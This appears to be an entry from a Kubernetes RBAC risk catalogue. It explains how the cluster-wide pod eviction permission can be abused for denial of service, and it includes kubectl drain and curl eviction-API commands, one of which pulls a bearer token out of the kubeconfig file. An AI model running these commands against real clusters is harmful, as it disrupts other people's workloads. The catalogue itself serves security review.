Evict Pods cluster-wide
Denial of Service
Medium
Overview
| Field | Value |
|---|---|
| ID | 1057 |
| Name | Evict Pods cluster-wide |
| Risk Category | Denial of Service |
| Risk Level | Medium |
| Role Type | ClusterRole |
| API Groups | policy |
| Resources | pods/eviction |
| Verbs | create |
| Tags | DenialOfService WorkloadLifecycle |
Description
Permits evicting (deleting) pods across all namespaces using the eviction API. This can be used to cause denial of service by disrupting running applications throughout the cluster.
Abuse Scenarios
- Evict all pods from a specific node, causing disruption.
kubectl drain <node-name> --ignore-daemonsets --delete-emptydir-data
# Example: kubectl drain minikube --ignore-daemonsets --delete-emptydir-data
- Evict a specific pod by directly calling the eviction API.
# Replace <kubernetes-api-server> with your API server address
# Replace <token> with your authentication token
curl -k -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -X POST \
--data '{"apiVersion":"policy/v1","kind":"Eviction","metadata":{"name":"<pod-name>","namespace":"<namespace>"}}' \
https://<kubernetes-api-server>/api/v1/namespaces/<namespace>/pods/<pod-name>/eviction
# Example: curl -k -H "Authorization: Bearer $(cat ~/.kube/config | grep token: | awk '{print $2}')" -H "Content-Type: application/json" -X POST --data '{"apiVersion":"policy/v1","kind":"Eviction","metadata":{"name":"my-app-pod-xyz","namespace":"default"}}' https://127.0.0.1:6443/api/v1/namespaces/default/pods/my-app-pod-xyz/eviction